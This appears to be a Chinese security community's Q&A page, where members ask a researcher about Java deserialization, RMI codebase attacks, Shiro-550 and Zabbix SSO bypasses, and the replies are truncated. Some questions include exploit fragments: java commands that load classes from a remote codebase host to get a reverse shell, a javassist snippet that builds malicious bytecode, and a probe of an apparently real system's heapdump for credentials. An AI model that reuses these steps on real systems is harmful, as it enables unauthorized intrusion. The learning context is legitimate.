你尚未登录

未加入『代码审计』知识星球的用户只能查看少量内容,且不能下载附件。 加入『代码审计』知识星球即可查看所有内容。

2022 五月 14
@Mr.Lee:

大佬,在网上看了你的一批关于zabbix sso单点登录认证绕过的漏洞分析,我在复现的时候搭建sso认证服务器的失败了,大佬有搭建环境的过程嘛

2022 四月 27
@路人甲:

p牛您好~ 请问php审计和java审计有没有什么关联捏,听别的师傅说php审计很厉害了才能去做java审计……那么我这种新人该怎么开始审计之旅捏? 我是刚入行的新人,对审计很感兴趣……但是在此之前不是后端程序员出身,大学期间多半在刷算法,不知道在审计这块学习路线是怎样的~望指点😆

他们的关联就是都是编程语言......
2022 一月 23
@abcd:

p神,你昨天晚上分享的那个rmi工具,提到了这个 - 绕过localhost限制来执行bind、unbind等写入操作(CVE-2019-2684) 翻了一下好像没找到哪里有对这个cve的相关分析,不知道是不是没找到,师傅有看到过吗

我......

图片


2022 一月 23
@路人甲:

尝试复现vulhub中的rmi-codebase,远程codebase上托管的payload如下,客户端调用都返回了7,怎么没有反弹shell呢,换成其他命令执行也不行。 具体步骤如下: 1.编译远程codebase上的RMIClient类及其内部类,并开启http服务; 2.运行rmiserver端,java -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer; 3.运行rmiclient端,java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://x.x.x.x:9980/ RMIClient 现象:http server收到了获取class的请求;client端未报错,输出7

可以回顾一下《Java安全漫谈》第一篇文章,里面有介绍下图三种初始化的代码在Java中有什么不同: ......

图片


2021 十二月 29
@test:

你好,我这边代码审计扫码之后,官网没有反应,没有自动登录,请问这种情况怎么处理?

不好意思,......
2021 十二月 21
@圆圆和方方:

感谢回复,我意思我先学习,然后讲给学生,我认为初级中级即可,高级可能对于我和我学生都有一些难,还有二进制这个问题,我思考过,得学习汇编和c,密码学又对数学要求很高,所以我觉得web方向比较适合我,然后如果企乐贷源码有的话,麻烦分享下网盘

接上个帖子。 我是感觉你想要做的太多了,很难在一门课上把这些全部囊括,如果学生目的性比较强就是找安服工作,那就讲......
2021 十二月 21
@圆圆和方方:

P牛,有点冒昧打扰到你,我是一名高校教师,西安工商学院,我知道你是西电毕业,也算半个老乡,我目前想给学生讲授较为系统的安全课程,目前课程体系涵盖了,常见漏洞,ctf题目复现,溯源,包括对linux中日志利用shell和awk进行筛选,iptables,win和linux提权,对于一句话绕过技巧,参考你的教程,应急响应,内网横向渗透,社工,信息收集,包括对等保和网络安全法的体现,华为防火墙,ids,ips等,准备加入zabbix和k8s内容,你觉得还应该在哪个方向着力,毕竟学生想毕业进渗透岗,目前进的多是安服岗位,我学校是个三本,但学生学习热情很高,程序学校有开设课程,就我现在说的太笼统,我想让你指导下我,比如ctf题目复现,看哪个ctf比赛题目,这么多比赛,我有点没头绪,不想浪费时间,想看一些高质量的,我也在持续学习,比如js,但我对java不熟悉,所以java漏洞我目前看不懂,准备明年用一年时间掌握。我想把xss,sql注入,ssrf,xxe,命令执行,这些讲的比较有深度,有助于学生就业,我也经常看你博客,学习你的思路,对我有很大帮助,就像时雨的十一这种综合漏洞,我觉得最能给学生以收获,最后再次感谢

我不太确定你的需求,到底是自己想学还是想给学生学,然后到底想要哪个层次的,CTF也分入门级、中级和高级,所以需要你明确自己的需求。 ......
2021 十月 31
@路人甲:

P牛您好,我在看 shiro 550漏洞,Tomcat 会有header max size 的问题,网上有两种方式: 1. 修改 max size 2. 加载器 但我实际实验起来,这两种方法本身都会超过 max size。我生成类的字节码方式是 先定义好恶意类,然后使用 javassist 生成字节码 ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(Evil.class.getName()); return clazz.toBytecode(); 请问有好的方式缩小字节码大小的方式吗

不知道你的恶意类是什么,如果只是简单地执行命令,可以直接使用网上现成的代码,不会超过长度限制,比如 GitHub - z......
2021 十月 23
@water:

p牛您好,我在学 java漫谈09反序列化3 时碰到了一个问题,按着书中代码我发现,collection没有了,经过一翻查询,发现好像是弃用了这个,也没找到如何添加。于是我添加了collections4。但这个类的transformedmap没有decorate方法,我找到了类似的方法transformedmap,即map outermap=transforedmap.transformedmap(innermap,null,transformerchain); 但是这样运行后并不能正常弹出计算机,而是程序直接结束了。 由于只能传一张图,我不知道描述的清不清楚。希望p牛能帮我解决一下,能直接运行书中代码的方法。

commons-collections和commons-co......
2021 十月 10
@路人甲:

通过spring boot heapdump下来的内存发现有fastjson,有什么方法定位其触发url,想测试下有没有fastjson的洞,我遇到的这套系统默认是用的jackson,试了几个接口都是jackson处理的,jackson的漏洞没有测试成功,不知道是不是姿势不对(java版本1.8.0_291)。或者内存文件还有什么高价值东西可以挖掘的,目前找了一圈没找到管理员账号信息,数据库不对外连接,认证用的spring security

......